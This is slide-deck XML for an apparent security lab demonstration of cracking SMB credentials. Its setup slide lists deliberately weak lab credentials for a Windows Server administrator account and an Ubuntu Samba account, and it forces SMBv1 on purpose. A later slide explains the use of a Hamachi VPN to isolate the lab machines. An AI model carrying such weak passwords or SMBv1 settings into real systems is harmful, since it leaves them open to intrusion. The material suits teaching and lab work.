                  <a:pt x="9617" y="9617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2963071" y="588929"/>
            <a:ext cx="230760" cy="230784"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="9618" w="9617">
                <a:moveTo>
                  <a:pt x="0" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0"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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-493481" y="4066884"/>
            <a:ext cx="453865" cy="583750"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="24328" w="18915">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-398749" y="4164688"/>
            <a:ext cx="268960" cy="38224"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1593" w="11209">
                <a:moveTo>
                  <a:pt x="1" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="1592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11209" y="1592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-398749" y="4238040"/>
            <a:ext cx="268960" cy="38224"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1593" w="11209">
                <a:moveTo>
                  <a:pt x="1" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="1592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11209" y="1592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-398749" y="4311369"/>
            <a:ext cx="212428" cy="38248"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1594" w="8853">
                <a:moveTo>
                  <a:pt x="1" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="1593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8853" y="1593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8853"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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3959391" y="2384451"/>
            <a:ext cx="385096" cy="427903"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1338705" y="153948"/>
            <a:ext cx="504279" cy="431958"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1483875" y="232891"/>
            <a:ext cx="97804" cy="226177"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1092516" y="2430305"/>
            <a:ext cx="165062" cy="166573"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-488898" y="1446198"/>
            <a:ext cx="145194" cy="145194"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="6051" w="6051">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3936452" y="266508"/>
            <a:ext cx="143682" cy="145194"/>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092516" y="2699241"/>
            <a:ext cx="165062" cy="166573"/>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69693" y="1435496"/>
            <a:ext cx="165062" cy="166597"/>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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="849711" y="1453829"/>
            <a:ext cx="1453233" cy="129933"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-848007" y="158003"/>
            <a:ext cx="2017116" cy="591405"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="24647" w="84064">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445946" y="532397"/>
            <a:ext cx="809903" cy="1066626"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1256018" y="481959"/>
            <a:ext cx="129909" cy="302217"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="12595" w="5414">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-432366" y="3597758"/>
            <a:ext cx="129909" cy="302577"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="12610" w="5414">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1074160" y="481959"/>
            <a:ext cx="128373" cy="302217"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="12595" w="535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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-432366" y="1941311"/>
            <a:ext cx="129909" cy="1601450"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="66741" w="5414">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3209091" y="4536010"/>
            <a:ext cx="1005510" cy="152824"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="168637" y="4665895"/>
            <a:ext cx="1180770" cy="378017"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1356869" y="2564773"/>
            <a:ext cx="189513" cy="161270"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="6721" w="7898">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1317134" y="1615819"/>
            <a:ext cx="594452" cy="129909"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="5414" w="24774">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3688919" y="3380771"/>
            <a:ext cx="169645" cy="437069"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3875336" y="3379235"/>
            <a:ext cx="171180" cy="438605"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779068" y="3467873"/>
            <a:ext cx="177275" cy="111577"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3867706" y="3617626"/>
            <a:ext cx="24" cy="24"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3650719" y="3330334"/>
            <a:ext cx="429415" cy="38224"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3650719" y="3830030"/>
            <a:ext cx="429415" cy="38224"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3772950" y="1883243"/>
            <a:ext cx="117647" cy="169645"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="7070" w="4903">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3905906" y="1883243"/>
            <a:ext cx="132956" cy="169645"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="7070" w="5541">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4069408" y="1883243"/>
            <a:ext cx="116160" cy="169645"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="7070" w="4841">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-522515" y="481959"/>
            <a:ext cx="88638" cy="171180"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="7134" w="369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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-415569" y="478912"/>
            <a:ext cx="142146" cy="175763"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="7325" w="5924">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1214747" y="1001523"/>
            <a:ext cx="131445" cy="169645"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="7070" w="5478">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1066530" y="1001523"/>
            <a:ext cx="134492" cy="169645"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="7070" w="5605">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-930526" y="1001523"/>
            <a:ext cx="224665" cy="169645"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="7070" w="9363">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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-689088" y="1001523"/>
            <a:ext cx="97828" cy="169645"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="7070" w="4077">
                <a:moveTo>
                  <a:pt x="1" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="7069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4076" y="7069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4076" y="5668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1529" y="5668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12309" y="4484061"/>
            <a:ext cx="155896" cy="203262"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192632" y="4384722"/>
            <a:ext cx="198679" cy="365252"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="15222" w="8280">
                <a:moveTo>
                  <a:pt x="6114" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2165" y="15221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801989" y="4086729"/>
            <a:ext cx="230760" cy="230784"/>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7"/>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Assumptions in setup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Google Shape;330;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410350" y="1421638"/>
            <a:ext cx="8520600" cy="2775600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>We will make the passwords weak (for both Ubuntu and Windows Server) so that they can be easily cracked in a short period of time for the purpose of demonstration. In the real world, these should be long and random.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Windows Server (COMPANY13\Administrator : Pa$$w0rd)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Ubuntu Samba Server (smbvictim : smbvictim)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The Ubuntu Machine </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> preconfigured with SMB protocol version 1, because in the real world, without forcing the server to use SMBv1, the server will probably use a later (or the latest version)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256625" y="391225"/>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Reasons for using Hamachi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277550" y="1427400"/>
            <a:ext cx="795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Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Google Shape;337;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410350" y="1421638"/>
            <a:ext cx="8520600" cy="3519600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Provides some form of security. </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Virtual machines communicate with each other directly (don’t need port forwarding and prevents accidental intrusion into other devices)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Free to set up VPN networks of up to 5 devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>suits our needs as we have only a few VMs for testing</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Actual Simulation of Remote Work</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>VPN is often used for remote administration of company devices</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
